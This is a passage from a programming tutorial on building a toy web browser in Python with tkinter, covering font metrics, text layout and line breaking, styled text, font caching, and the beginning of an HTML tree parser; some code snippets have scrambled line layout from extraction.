the Browser constructor.
import tkinter.font
class Browser:
def __init__(self):
# ...
= tkinter.font.Font(
bi_times ="Times",
family=16,
size="bold",
weight="italic",
slant )
Your computer might not have “Times” installed; you can list the
available fonts with tkinter.font.families()
and pick
something else.
Font objects can be passed to create_text
’s
font
argument:
200, 100, text="Hi!", font=bi_times) canvas.create_text(
In the olden times, American type setters kept their boxes of metal shapes arranged in a California job case, which combined lower- and upper-case letters side by side in one case, making type setting easier. The upper-/lower-case nomenclature dates from centuries earlier.
Text takes up space vertically and horizontally, and the font
object’s metrics
and measure
methods measure
that space:On your
computer, you might get different numbers. That’s right—text rendering
is OS-dependent, because it is complex enough that everyone uses one of
a few libraries to do it, usually libraries that ship with the OS.
That’s why macOS fonts tend to be “blurrier” than the same font on
Windows: different libraries make different
trade-offs.
>>> bi_times.metrics()
'ascent': 15, 'descent': 7, 'linespace': 22, 'fixed': 0}
{>>> bi_times.measure("Hi!")
31
The metrics
call yields information about the vertical
dimensions of the text: the linespace
is how tall the text
is, which includes an ascent
which goes “above the line”
and a descent
that goes “below the line”.The fixed
parameter is actually a boolean and tells you whether all letters are
the same width, so it doesn’t really fit here.
The ascent
and descent
matter when words in
different sizes sit on the same line: they ought to line up “along the
line”, not along their tops or bottoms.
Let’s dig deeper. Remember that bi_times
is size-16
Times: why does font.metrics
report that it is actually 22
pixels tall? Well, first of all, size-16 meant sixteen points,
which are defined as 72nds of an inch, not sixteen
pixels, which your monitor probably has around 100 of per
inch.Tk doesn’t use
points anywhere else in its API. It’s supposed to use pixels if you pass
it a negative number, but that doesn’t appear to work.
Those sixteen points measure not the individual letters but the metal
blocks the letters were once carved from, which by necessity were larger
than the letters themselves. In fact, different size-16 fonts have
letters of varying heights:
>>> tkinter.font.Font(family="Courier", size=16).metrics()
'fixed': 1, 'ascent': 13, 'descent': 4, 'linespace': 17}
{>>> tkinter.font.Font(family="Times", size=16).metrics()
'fixed': 0, 'ascent': 14, 'descent': 4, 'linespace': 18}
{>>> tkinter.font.Font(family="Helvetica", size=16).metrics()
'fixed': 0, 'ascent': 15, 'descent': 4, 'linespace': 19} {
The measure()
method is more direct: it tells you how
much horizontal space text takes up, in pixels. This depends on
the text, of course, since different letters have different width:The sum at the end of this
snippet may not work on your machine: the width of a word is not always
the sum of the widths of its letters. That’s because Tk uses fractional
pixels internally, but rounds up to return whole pixels. For example,
some fonts use something called kerning to shift letters a
little bit when particular pairs of letters are next to one
another.
>>> bi_times.measure("Hi!")
31
>>> bi_times.measure("H")
17
>>> bi_times.measure("i")
6
>>> bi_times.measure("!")
8
>>> 17 + 8 + 6
31
You can use this information to lay text out on the page. For example, suppose you want to draw the text “Hello, world!” in two pieces, so that “world!” is italic. Let’s use two fonts:
= tkinter.font.Font(family="Times", size=16)
font1 = tkinter.font.Font(family="Times", size=16, slant='italic') font2
We can now lay out the text, starting at (200, 200)
:
= 200, 200
x, y ="Hello, ", font=font1)
canvas.create_text(x, y, text+= font1.measure("Hello, ")
x ="world!", font=font2) canvas.create_text(x, y, text
You should see “Hello,” and “world!”, correctly aligned and with the second word italicized.
Unfortunately, this code has a bug, though one masked by the choice
of example text: replace “world!” with “overlapping!” and the two words
will overlap. That’s because the coordinates x
and
y
that you pass to create_text
tell Tk where
to put the center of the text. It only worked for “Hello,
world!” because “Hello,” and “world!” are the same length!
Luckily, the meaning of the coordinate you pass in is configurable.
We can instruct Tk to treat the coordinate we gave as the top-left
corner of the text by setting the anchor
argument to
"nw"
, meaning the “northwest” corner of the text:
= 200, 225
x, y ="Hello, ", font=font1, anchor='nw')
canvas.create_text(x, y, text+= font1.measure("Hello, ")
x ="overlapping!", font=font2, anchor='nw') canvas.create_text(x, y, text
Modify the draw
function to set anchor
to
"nw"
; we didn’t need to do that in the previous chapter
because all Chinese characters are the same width.
If you find font metrics confusing, you’re not the only one! In 2012, the Michigan Supreme Court heard Stand Up for Democracy v. Secretary of State, a case that centered on the definition of font size. The court decided (correctly) that font size is the size of the metal blocks that letters were carved from and not the size of the letters themselves.
In the last chapter, the layout
function looped over the
text character-by-character and moved to the next line whenever we ran
out of space. That’s appropriate in Chinese, where each character more
or less is a word. But in English you can’t move to the next
line in the middle of a word. Instead, we need to lay out the text one
word at a time:This code
splits words on whitespace. It’ll thus break on Chinese, since there
won’t be whitespace between words. Real browsers use language-dependent
rules for laying out text, including for identifying word
boundaries.
= font.measure(word)
w if cursor_x + w > WIDTH - HSTEP:
+= font.metrics("linespace") * 1.25
cursor_y = HSTEP
cursor_x self.display_list.append((cursor_x, cursor_y, word))
+= w + font.measure(" ") cursor_x
There’s a lot of moving parts to this code. First, we measure the
width of the text, and store it in w
. We’d normally draw
the text at cursor_x
, so its right end would be at
cursor_x + w
, so we check if that’s past the edge of the
page. Now we have the location to start drawing the word, so we
add to the display list; and finally we update cursor_x
to
point to the end of the word.
There are a few surprises in this code. One is that I call
metrics
with an argument; that just returns the named
metric directly. Also, I increment cursor_x
by
w + font.measure(" ")
instead of w
. That’s
because I want to have spaces between the words: the call to
split()
removed all of the whitespace, and this adds it
back. I don’t add the space to w
on the second line,
though, because you don’t need a space after the last word on a
line.
Finally, note that I multiply the linespace by 1.25 when incrementing
y
. Try removing the multiplier: you’ll see that the text is
harder to read because the lines are too close together.Designers say the text is too
“tight”. Instead, it is common to add “line spacing” or
“leading”So named
because in metal type days, thin pieces of lead were placed between the
lines to space them out. Lead is a softer metal than what the actual
letter pieces were made of, so it could compress a little to keep
pressure on the other pieces. Pronounce it “led-ing” not
“leed-ing”. between lines. The 25% line spacing is a
normal amount.
Breaking lines in the middle of a word is called hyphenation, and can
be turned on via the hyphens
CSS property. Browsers use the Knuth-Liang
hyphenation algorithm, which uses a dictionary of word fragments to
prioritize possible hyphenation points, to implement this.
Right now, all of the text on the page is drawn with one font. But
web pages sometimes bold or italicize text
using the <b>
and <i>
tags. It’d
be nice to support that, but right now, the code resists the change: the
layout
function only receives the text of the page as
input, and so has no idea where the bold and italics tags are.
Let’s change lex
to return a list of tokens,
where a token is either a Text
object (for a run of
characters outside a tag) or a Tag
object (for the contents
of a tag). You’ll need to write the Text
and
Tag
classes:If you’re familiar with Python, you might want to use the
dataclass
library, which makes it easier to define these
sorts of utility classes.
class Text:
def __init__(self, text):
self.text = text
class Tag:
def __init__(self, tag):
self.tag = tag
lex
must now gather text into Text
and
Tag
objects:If you’ve done exercises in prior chapters, your code will
look different. Code snippets in the book always assume you haven’t done
the exercises, so you’ll need to port your
modifications.
def lex(body):
= []
out = ""
text = False
in_tag for c in body:
if c == "<":
= True
in_tag if text: out.append(Text(text))
= ""
text elif c == ">":
= False
in_tag
out.append(Tag(text))= ""
text else:
+= c
text if not in_tag and text:
out.append(Text(text))return out
At the end of the loop, lex
dumps any accumulated text
as a Text
object. Otherwise, if you never saw an angle
bracket, you’d return an empty list of tokens. But unfinished tags, like
in Hi!<hr
, are thrown out.This may strike you as an odd
decision: why not raise an error, or finish up the tag for the author?
Good questions, but dropping the tag is what browsers
do.
Note that Text
and Tag
are asymmetric:
lex
avoids empty Text
objects, but not empty
Tag
objects. That’s because an empty Tag
object represents the HTML code <>
, while an empty
Text
object with empty text represents no content at
all.
Since we’ve modified lex
we are now passing
layout
not just the text of the page, but also the tags in
it. So layout
must loop over tokens, not text:
def layout(tokens):
# ...
for tok in tokens:
if isinstance(tok, Text):
for word in tok.text.split():
# ...
# ...
layout
can also examine tag tokens to change font when
directed by the page. Let’s start with support for weights and styles,
with two corresponding variables:
= "normal"
weight = "roman" style
Those variables must change when the bold and italics open and close tags are seen:
if isinstance(tok, Text):
# ...
elif tok.tag == "i":
= "italic"
style elif tok.tag == "/i":
= "roman"
style elif tok.tag == "b":
= "bold"
weight elif tok.tag == "/b":
= "normal" weight
Note that this code correctly handles not only
<b>bold</b>
and
<i>italic</i>
text, but also
<b><i>bold italic</i></b>
text.It even handles
mis-nested tags like
<b>b<i>bi</b>i</i>
, but it does not
handle <b><b>twice</b>bolded</b>
text. We’ll return to both in the next
chapter.
The bold
and italic
variables are used to
select the font. Since the font is computed in layout
but
used in draw
, we’ll need to add the font used to each entry
in the display list.
if isinstance(tok, Text):
for word in tok.text.split():
= tkinter.font.Font(
font =16,
size=weight,
weight=style,
slant
)# ...
display_list.append((cursor_x, cursor_y, word, font))
Make sure to update draw
to expect and use this extra
font field in display list entries.
Italic fonts were developed in Italy (hence the name) to mimic a cursive handwriting style called “chancery hand”. Non-italic fonts are called roman because they mimic text on Roman monuments. There is an obscure third option: oblique fonts, which look like roman fonts but are slanted.
With all of these tags, layout
has become quite large,
with lots of local variables and some complicated control flow. That is
one sign that something deserves to be a class, not a function:
class Layout:
def __init__(self, tokens):
self.display_list = []
Every local variable in layout
then becomes a field of
Layout
:
self.cursor_x = HSTEP
self.cursor_y = VSTEP
self.weight = "normal"
self.style = "roman"
self.size = 16
The core of the old layout
is a loop over tokens, and we
can move the body of that loop to a method on Layout
:
def __init__(self, tokens):
# ...
for tok in tokens:
self.token(tok)
def token(self, tok):
if isinstance(tok, Text):
for word in tok.text.split():
# ...
elif tok.tag == "i":
self.style = "italic"
# ...
In fact, the body of the isinstance(tok, Text)
branch
can be moved to its own method:
def word(self, word):
= tkinter.font.Font(
font =16,
size=self.weight,
weight=self.style,
slant
)= font.measure(word)
w # ...
Now that everything has moved out of Browser
’s old
layout
function, it can be replaced with calls into
Layout
:
class Browser:
def load(self, url):
= url.request()
headers, body = lex(body)
tokens self.display_list = Layout(tokens).display_list
self.draw()
When you do big refactors like this, it’s important to work incrementally. It might seem more efficient to change everything at once, that efficiency brings with it a risk of failure: trying to do so much that you get confused and have to abandon the whole refactor.
Anyway, this refactor isolated all of the text-handling code into its
own method, with the main token
function just branching on
the tag name. Let’s take advantage of the new, cleaner organization to
add more tags. With font weights and styles working, size is the next
frontier in typographic sophistication. One simple way to change font
size is the <small>
tag and its deprecated sister tag
<big>
.In your web design projects, use the CSS
font-size
property to change text size instead of
<big>
and <small>
. But since we
haven’t implemented CSS for our browser, we’re
stuck using them here.
Our experience with font styles and weights suggests a simple
approach. First, a field in Layout
to track font size:
self.size = 16
That variable is used to create the font object:
= tkinter.font.Font(
font =self.size,
size=self.weight,
weight=self.style,
slant )
Finally, the <big>
and <small>
tags change the value of size
:
def token(self, tok):
# ...
elif tok.tag == "small":
self.size -= 2
elif tok.tag == "/small":
self.size += 2
elif tok.tag == "big":
self.size += 4
elif tok.tag == "/big":
self.size -= 4
Try wrapping a whole paragraph in <small>
, like
you would a bit of fine print, and enjoy your newfound typographical
freedom.
All of <b>
, <i>
,
<big>
, and <small>
date from an
earlier, pre-CSS era of the web. Since CSS can now change how those tags
appear, <b>
, <i>
, and
<small>
have hair-splitting appearance-independent
meanings.
Start mixing font sizes, like
<small>a</small><big>A</big>
, and
you’ll quickly notice a problem with the font size code: the text is
aligned along its top, not “along the line”, as if it’s hanging from a
clothes line.
Let’s think through how to fix this. If the big text is moved up, it
would overlap with the previous line, so the smaller text has to be
moved down. That means its vertical position has to be computed later,
after the big text passes through token
. But since
the small text comes through the loop first, we need a two-pass
algorithm for lines of text: the first pass identifies what words go in
the line and computes their x positions, while the second pass
vertically aligns the words and computes their y positions.
Let’s start with phase one. Since one line contains text from many
tags, we need a field on Layout
to store the line-to-be.
That field, line
, will be a list, and text
will add words to it instead of the display list. Entries in
line
will have x but not y positions,
since y positions aren’t computed in the first phase:
class Layout:
def __init__(self, tokens):
# ...
self.line = []
# ...
def word(self, word):
# ...
self.line.append((self.cursor_x, word, font))
The new line
field is essentially a buffer, where words
are held temporarily before they can be placed. The second phase is that
buffer being flushed when we’re finished with a line:
class Layout:
def word(self, word):
if self.cursor_x + w > WIDTH - HSTEP:
self.flush()
As usual with buffers, we also need to make sure the buffer is flushed once all tokens are processed:
class Layout:
def __init__(self, tokens):
# ...
self.flush()
This new flush
function has three responsibilities:
cursor_x
and cursor_y
fieldsHere’s what it looks like, step by step:
Since we want words to line up “on the line”, let’s start by computing where that line should be. That depends on the metrics for all the fonts involved:
def flush(self):
if not self.line: return
= [font.metrics() for x, word, font in self.line] metrics
We need to locate the tallest word:
= max([metric["ascent"] for metric in metrics]) max_ascent
The line is then max_ascent
below self.y
—or
actually a little more to account for the leading:Actually, 25% leading doesn’t
add 25% of the ascender above the ascender and 25% of the descender
below the descender. Instead, it adds 12.5% of the line
height in both places, which is subtly different when fonts are
mixed. But let’s skip that subtlety here.
= self.cursor_y + 1.25 * max_ascent baseline
Now that we know where the line is, we can place each word relative to that line and add it to the display list:
for x, word, font in self.line:
= baseline - font.metrics("ascent")
y self.display_list.append((x, y, word, font))
Note how y
starts at the baseline, and moves up
by just enough to accomodate that word’s ascender.
Finally, flush
must update the Layout
’s
x
, y
, and line
fields.
x
and line
are easy:
self.cursor_x = HSTEP
self.line = []
Meanwhile, y
must be far enough below
baseline
to account for the deepest descender:
= max([metric["descent"] for metric in metrics])
max_descent self.cursor_y = baseline + 1.25 * max_descent
Now all the text is aligned along the line, even when text sizes are
mixed. Plus, this new flush
function is convenient for
other line breaking jobs. For example, in HTML the
<br>
tagWhich is a self-closing tag, so there’s no
</br>
. Many tags that are content, instead
of annotating it, are like this. Some people like adding a final slash
to self-closing tags, like <br/>
, but this is not
required in HTML. ends the current line and starts a new
one:
def token(self, tok):
# ...
elif tok.tag == "br":
self.flush()
Likewise, paragraphs are defined by the <p>
and
</p>
tags, so </p>
also ends the
current line:
def token(self, tok):
# ...
elif tok.tag == "/p":
self.flush()
self.cursor_y += VSTEP
I add a bit extra to cursor_y
here to create a little
gap between paragraphs.
Actually, browsers support not only horizontal but also vertical writing systems, like some traditional East Asian writing styles. A particular challenge is Mongolian script.
Now that you’ve implemented styled text, you’ve probably
noticed—unless you’re on macOSWhile we can’t confirm this in the documentation, it seems
that the macOS “Core Text” APIs cache fonts more aggressively than Linux
and Windows. The optimization described in this section won’t hurt any
on macOS, but also won’t improve speed as much as on Windows and
Linux.—that on a large web page like this chapter your
browser has slowed significantly from the last
chapter. That’s because text layout, and specifically the part where
you measure each word, is quite slow.You can profile Python programs by replacing your
python3
command with python3 -m cProfile
. Look
for the lines corresponding to the measure
and
metrics
calls to see how much time is spent measuring
text.
Unfortunately, it’s hard to make text measurement much faster. With proportional fonts and complex font features like hinting and kerning, measuring text can require pretty complex computations. But on a large web page, some words likely appear a lot—for example, this page includes the word “the” over two hundred times. Instead of measuring these words over and over again, we could measure them once, and then cache the results. On normal English text, this usually results in a substantial speedup.
Caching is such a good idea that most text libraries already
implement it. But because our text
method creates a new
Font
object for each word, our browser isn’t taking
advantage of that caching. If we only made a new Font
object when we had to, the built-in caches would work better and our
browser would be faster. So we’ll need our own cache, so that we can
reuse Font
objects and have our text measurements
cached.
We’ll store our cache in a global FONTS
dictionary:
= {} FONTS
The keys to this dictionary will be size/weight/style triples, and
the values will be Font
objects. We can put the caching
logic itself in a new get_font
function:
def get_font(size, weight, slant):
= (size, weight, slant)
key if key not in FONTS:
= tkinter.font.Font(size=size, weight=weight, slant=slant)
font = font
FONTS[key] return FONTS[key]
Now, inside the text
method we can call
get_font
instead of creating a Font
object
directly:
class Layout:
def word(self, word):
= get_font(self.size, self.weight, self.style)
font # ...
Fonts for scripts like Chinese can be megabytes in size, so they are generally stored on disk and only loaded into memory on-demand. That makes font loading slow. Browsers also have extensive caches for measuring, shaping, and rendering text. Because web pages have a lot of text, these caches turn out to be one of the most important parts of speeding up rendering.
The last chapter introduced a browser that laid out Chinese text. Now it does English, too:
You can now use your browser to read an essay, a blog post, or a book!
The complete set of functions, classes, and methods in our browser should look something like this:
class URL:
def __init__(url)
def request()
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
class Browser:
def __init__()
def load(url)
def draw()
def scrolldown(e)
class Text:
def __init__(text)
def __repr__()
class Tag:
def __init__(tag)
def __repr__()
def lex(body)
FONTS
def get_font(size, weight, slant)
class Layout:
def __init__(tokens)
def token(tok)
def word(word)
def flush()
if __name__ == "__main__"
Centered Text: This book’s page titles are centered: find
them between <h1 class="title">
and
</h1>
. Make your browser center the text in these
titles. Each line has to be centered individually, because different
lines will have different lengths.
Superscripts: Add support for the <sup>
tag: text in this tag should be smaller (perhaps half the normal text
size) and be placed so that the top of a superscript lines up with the
top of a normal letter.
Soft hyphens: The soft hyphen character, written
\N{soft hyphen}
in Python, represents a place where the
text renderer can, but doesn’t have to, insert a hyphen and break the
word across lines. Add support for it.If you’ve done a previous
exercise on HTML entities, you might also want to add support for
the ­
entity, which expands to a soft
hyphen. If a word doesn’t fit at the end of a line, check
if it has soft hyphens, and if so break the word across lines. Remember
that a word can have multiple soft hyphens in it, and make sure to draw
a hyphen when you break a word. The word
“supercalafragalisticexpialadoshus” is a good test case.
Small caps: Make the <abbr>
element
render text in small caps, like this. Inside an
<abbr>
tag, lower-case letters should be small,
capitalized, and bold, while all other characters (upper case, numbers,
etc) should be drawn in the normal font.
Preformatted text: Add support for the
<pre>
tag. Unlike normal paragraphs, text inside
<pre>
tags doesn’t automatically break lines, and
whitespace like spaces and newlines are preserved. Use a fixed-width
font like Courier New
or SFMono
as well. Make
sure tags work normally inside <pre>
tags: it should
be possible to bold some text inside a <pre>
.
So far, your web browser sees web pages as a stream of open tags, close tags, and text. But HTML is actually a tree, and though the tree structure hasn’t been important yet, it will be once backgrounds, margins, and CSS enter the picture. So this chapter adds a proper HTML parser and converts the layout engine to use it.
The HTML treeThis is
the tree that is usually called the DOM tree, for Document
Object Model. We’ll keep calling it the HTML tree for
now. has one node for each open and close tag pair and for
each span of text.In
reality there are other types of nodes too, like comments, doctypes, and
CDATA
sections, and processing instructions. There are even
some deprecated types! So for our browser to be a tree,
tokens need to evolve into nodes. That means adding a list of children
and a parent pointer to each one. Here’s the new Text
class:The
children
field of a Text
node will always be
empty; I’m defining it here to make it easier to write code that handles
Text
and Element
nodes
simultaneously.
class Text:
def __init__(self, text, parent):
self.text = text
self.children = []
self.parent = parent
Since it takes two tags (the open and the close tag) to make a node,
let’s rename the Tag
class to Element
, and
make it look like this:
class Element:
def __init__(self, tag, parent):
self.tag = tag
self.children = []
self.parent = parent
I added a children
field to both Text
and
Element
, even though text nodes never have children. That’s
for consistency, to avoid isinstance
calls throughout the
code.
Constructing a tree of nodes from source code is called parsing. A parser builds a tree one element or text node at a time. But that means the parser needs to store an incomplete tree. For example, suppose the parser has so far read this bit of HTML:
<html><head></head><body><h1>This is my webpage
The parser has seen five tags (and one text node). The rest of the
HTML will contain more open tags, close tags, and text; but no matter
which tokens it sees, no new nodes will be added to the
<head>
tag, which has already been closed. So that
node is “finished”. But the other nodes are unfinished: more children
can be added to the <html>
,
<body>
, and <h1>
nodes, depending
on what HTML comes next.
Since the parser reads the HTML file from left to right, these unfinished tags are always in a certain part of the tree. The unfinished tags have always been opened but not yet closed; they are always to the right of the finished nodes; and they are always children of other unfinished tags. To leverage these facts, let’s represent an incomplete tree by storing a list of unfinished tags, ordered with parents before children. The first node in the list is the root of the HTML tree; the last node in the list is the most recent unfinished tag.In Python, and most other languages, it’s faster to add and remove from the end of a list, instead of the beginning.
Parsing is a little more complex than lex
, so we’re
going to want to break it into several functions, organized in a new
HTMLParser
class. That class can also store the source code
it’s analyzing and the incomplete tree:
class HTMLParser:
def __init__(self, body):
self.body = body
self.unfinished = []
Before the parser starts, it hasn’t seen any tags at all, so the
unfinished
list storing the tree starts empty. But as the
parser reads tokens, that list fills up. Let’s start that by renaming
the lex
function we have now, aspirationally, to
parse
:
class HTMLParser:
def parse(self):
# ...
We’ll need to do a bit of surgery on parse
. Right now
parse
creates Tag
and Text
objects and appends them to the out
array. We need it to
create Element
and Text
objects and add them
to the unfinished
tree. Since a tree is a bit more complex
than a list, I’ll move the adding-to-a-tree logic to two new methods
add_text
and add_tag
.
def parse(self):
= ""
text = False
in_tag for c in self.body:
if c == "<":
= True
in_tag if text: self.add_text(text)
= ""
text elif c == ">":
= False
in_tag self.add_tag(text)
= ""
text else:
+= c
text if not in_tag and text:
self.add_text(text)
return self.finish()
The out
variable is gone, and note that I’ve also moved
the return value to a new finish
method, which converts the
incomplete tree to the final, complete tree. So: how do we add things to
the tree?
HTML derives from a long line of document processing systems. Its
predecessor, SGML,
traces back to RUNOFF and is
a sibling to troff, now used for Linux
man pages. The committee that
standardized SGML now works on the .odf
,
.docx
, and .epub
formats.
Let’s talk about adding nodes to a tree. To add a text node we add it as a child of the last unfinished node:
class HTMLParser:
def add_text(self, text):
= self.unfinished[-1]
parent = Text(text, parent)
node parent.children.append(node)
On the other hand, tags are a little more complex since they might be an open or a close tag:
class HTMLParser:
def add_tag(self, tag):
if tag.startswith("/"):
# ...
else:
# ...
A close tag removes an unfinished node, by finishing it, and add it to the next unfinished node in the list:
def add_tag(self, tag):
if tag.startswith("/"):
= self.unfinished.pop()
node = self.unfinished[-1]
parent
parent.children.append(node)# ...
An open tag instead adds an unfinished node to the end of the list:
def add_tag(self, tag):
# ...
else:
= self.unfinished[-1]
parent = Element(tag, parent)
node self.unfinished.append(node)
Once the parser is done, it turns our incomplete tree into a complete tree by just finishing any unfinished nodes:
class HTMLParser:
def finish(self):
if len(self.unfinished) == 0:
self.add_tag("html")
while len(self.unfinished) > 1:
= self.unfinished.pop()
node = self.unfinished[-1]
parent
parent.children.append(node)return self.unfinished.pop()
This is almost a complete parser, but it doesn’t quite work at the beginning and end of the document. The very first open tag is an edge case without a parent:
def add_tag(self, tag):
# ...
else:
= self.unfinished[-1] if self.unfinished else None
parent # ...
The very last tag is also an edge case, because there’s no unfinished node to add it to:
def add_tag(self, tag):
if tag.startswith("/"):
if len(self.unfinished) == 1: return
# ...
Ok, that’s all done. Let’s test our parser out and see how well it works!
The ill-considered Javascript document.write
method
allows Javascript to modify the HTML source code while it’s being
parsed! Modern browsers use speculative
parsing to make this fast and avoid evaluating Javascript while
parsing.
How do we know our parser does the right thing—that it builds the right tree? Well the place to start is seeing the tree it produces. We can do that with a quick, recursive pretty-printer:
def print_tree(node, indent=0):
print(" " * indent, node)
for child in node.children:
+ 2) print_tree(child, indent
Here we’re printing each node in the tree, and using indentation to
show the tree structure. Since we need to print each node, it’s worth
taking the time to give them a nice printed form, which in Python means
defining the __repr__
function:
class Text:
def __repr__(self):
return repr(self.text)
class Element:
def __repr__(self):
return "<" + self.tag + ">"
Try this out on this web page, parsing the HTML source code and then
calling print_tree
to visualize it:
= URL(sys.argv[1]).request()
headers, body = HTMLParser(body).parse()
nodes print_tree(nodes)
Run it on this web page, and you’ll see something like this:
<!doctype html>
'\n'
<html lang="en-US" xml:lang="en-US">
'\n'
<head>
'\n '
<meta charset="utf-8" />
'\n '
<meta name="generator" content="pandoc" />
'\n '
Immediately a couple of things stand out. Let’s start at the top,
with the <!doctype html>
tag.
This special tag, called a doctype, is always the very first thing in an HTML document. But it’s not really an element at all, nor is it supposed to have a close tag. Our toy browser won’t be using the doctype for anything, so it’s best to throw it away:Real browsers use doctypes to switch between standards-compliant and legacy parsing and layout modes.
def add_tag(self, tag):
if tag.startswith("!"): return
# ...
This ignores all tags that start with an exclamation mark, which not
only throws out doctype declarations but also most comments, which in
HTML are written <!-- comment text -->
.
Just throwing out doctypes isn’t quite enough though—if you run your
parser now, it will crash. That’s because after the doctype comes a
newline, which our parser treats as text and tries to insert into the
tree. Except there isn’t a tree, since the parser hasn’t seen any open
tags. For simplicity, let’s just have our browser skip whitespace-only
text nodes to side-step the problem:Real browsers retain whitespace to correctly render
make<span></span>up
as one word and
make<span> </span>up
as two. Our browser won’t.
Plus, ignoring whitespace simplifies later
chapters by avoiding a special-case for whitespace-only text
tags.
def add_text(self, text):
if text.isspace(): return
# ...
The parsed HTML tree now looks like this:
<html lang="en-US" xml:lang="en-US">
<head>
<meta charset="utf-8" />
<meta name="generator" content="pandoc" />
<meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=yes" />
<meta name="author" content="Pavel Panchekha & Chris Harrelson" />
<link rel="stylesheet" href="book.css" />
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Vollkorn%7CLora&display=swap" />
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Vollkorn:400i%7CLora:400i&display=swap" />
<title>
Why’s everything so deeply indented? Why aren’t these open elements ever closed?
In SGML, document type declarations had a URL to define the valid
tags. Browsers use the absence of a document type declaration to identify
very old, pre-SGML versions of HTML,There’s also this crazy thing called “almost standards” or “limited
quirks” mode, due to a backwards-incompatible change in table cell
vertical layout. Yes. I don’t need to make these up! but
don’t use the URL, so <!doctype html>
is the best
document type declaration for HTML.
Elements like <meta>
and <link>
are what are called self-closing: these tags don’t surround content, so
you don’t ever write </meta>
or
</link>
. Our parser needs special support for them.
In HTML, there’s a specific
list of these self-closing tags (the spec calls them “void”
tags):A lot of these
tags are obscure. Browsers also support some additional, obsolete
self-closing tags not listed here, like
keygen
.
= [
SELF_CLOSING_TAGS "area", "base", "br", "col", "embed", "hr", "img", "input",
"link", "meta", "param", "source", "track", "wbr",
]
Our parser needs to auto-close tags from this list:
def add_tag(self, tag):
# ...
elif tag in self.SELF_CLOSING_TAGS:
= self.unfinished[-1]
parent = Element(tag, parent)
node parent.children.append(node)
This code is right, but if you test it out it won’t seem to help. Why
not? Our parser is looking for a tag named meta
, but it’s
finding a tag named “meta name=...
”. The self-closing code
isn’t triggered because the <meta>
tag has
attributes.
HTML attributes add information about an element; open tags can have any number of attributes. Attribute values can be quoted, unquoted, or omitted entirely. Let’s focus on basic attribute support, ignoring values that contain whitespace, which are a little complicated.
Since we’re not handling whitespace in values, we can split on whitespace to get the tag name and the attribute-value pairs:
class HTMLParser:
def get_attributes(self, text):
= text.split()
parts = parts[0].lower()
tag = {}
attributes for attrpair in parts[1:]:
# ...
return tag, attributes
HTML tag names are case-insensitive,This is not the right way to do case insensitive comparisons; the Unicode case folding algorithm should be used if you want to handle languages other than English. But in HTML specifically, tag names only use the ASCII characters so lower-casing them is sufficient. as by the way are attribute values, so I convert them to lower case. Then, inside the loop, I split each attribute-value pair into a name and a value. The easiest case is an unquoted attribute, where an equal sign separates the two:
def get_attributes(self, text):
# ...
for attrpair in parts[1:]:
if "=" in attrpair:
= attrpair.split("=", 1)
key, value = value
attributes[key.lower()] # ...
The value can also be omitted, like in
<input disabled>
, in which case the attribute value
defaults to the empty string:
for attrpair in parts[1:]:
# ...
else:
= "" attributes[attrpair.lower()]
Finally, the value can be quoted, in which case the quotes have to be stripped out:Quoted attributes allow whitespace between the quotes. That requires something like a finite state machine instead of just splitting on whitespace.
if "=" in attrpair:
# ...
if len(value) > 2 and value[0] in ["'", "\""]:
= value[1:-1]
value # ...
We’ll store these attributes inside Element
s:
class Element:
def __init__(self, tag, attributes, parent):
self.tag = tag
self.attributes = attributes
# ...
That means we’ll need to call get_attributes
at the top
of add_tag
, to get the attributes
we need to
construct an Element
.
def add_tag(self, tag):
= self.get_attributes(tag) tag, attributes
Remember to use tag
and attribute
instead
of text
in add_tag
, and try your parser
again:
<html>
<head>
<meta>
<meta>
<meta>
<meta>
<link>
<link>
<link>
<title>
It’s close! Yes, if you print the attributes, you’ll see that
attributes with whitespace (like author
on the fourth
meta
tag) are mis-parsed as multiple attributes, and the
final slash on the self-closing tags is incorrectly treated as an extra
attribute. A better parser would fix these issues. But let’s instead
leave our parser as is—these issues aren’t going to be a problem for the
toy browser we’re building—and move on to integrating it with our
browser.
Putting a slash at the end of self-closing tags, like
<br/>
, became fashionable when XHTML looked like it might
replace HTML, and old-timers like me never broke the habit. But unlike
in XML, in HTML
self-closing tags are identified by name, not by some special syntax, so
the slash is optional.
Right now, the Layout
class works token-by-token; we now
want it to go node-by-node instead. So let’s separate the old
token
method into three parts: all the cases for open tags
will go into a new open_tag
method; all the cases for close
tags will go into a new close_tag
method; and instead of
having a case for text tokens our browser can just call the existing
text
method directly:
class Layout:
def open_tag(self, tag):
if tag == "i":
self.style = "italic"
# ...
def close_tag(self, tag):
if tag == "i":
self.style = "roman"
# ...
Now we need the Layout
object to walk the node tree,
calling open_tag
, close_tag
, and
text
in the right order:
def recurse(self, tree):
if isinstance(tree, Text):
for word in tree.text.split():
self.word(word)
else:
self.open_tag(tree.tag)
for child in tree.children:
self.recurse(child)
self.close_tag(tree.tag)
The Layout
constructor can now call recurse
instead of looping through the list of tokens. We’ll also need the
browser to construct the node tree, like this:
class Browser:
def load(self, url):
= url.request()
headers, body self.nodes = HTMLParser(body).parse()
self.display_list = Layout(self.nodes).display_list
self.draw()
Run it—the browser should now work off of the parsed HTML tree.
Prior to the invention of CSS, some browsers supported web page
styling using attributes like bgcolor
and
vlink
(the color of visited links) and tags like
font
. These are
obsolete, but browsers still support some of them.
The parser now handles HTML pages correctly—at least when the HTML is
written by the sorts of goody-two-shoes programmers who remember the
<head>
tag, close every open tag, and make their bed
in the morning. Mere mortals lack such discipline and so browsers also
have to handle broken, confusing, headless HTML. In fact, modern HTML
parsers are capable of transforming any string of characters
into an HTML tree, no matter how confusing the markup.Yes, it’s crazy, and for a few
years in the early ’00s the W3C tried to do away with it. They
failed.
The full algorithm is, as you might expect, complicated beyond belief, with dozens of ever-more-special cases forming a taxonomy of human error, but one of its nicer features is implicit tags. Normally, an HTML document starts with a familiar boilerplate:
<!doctype html>
<html>
<head>
</head>
<body>
</body>
</html>
In reality, all six of these tags, except the doctype, are
optional: browsers insert them automatically. Let’s add support for
implicit tags to our browser via a new implicit_tags
function that adds implicit tags when the web page omits them. We’ll
want to call it in both add_text
and
add_tag
:
class HTMLParser:
def add_text(self, text):
if text.isspace(): return
self.implicit_tags(None)
# ...
def add_tag(self, tag):
= self.get_attributes(tag)
tag, attributes if tag.startswith("!"): return
self.implicit_tags(tag)
# ...
Note that implicit_tags
isn’t called for the ignored
whitespace and doctypes. The argument to implicit_tags
is
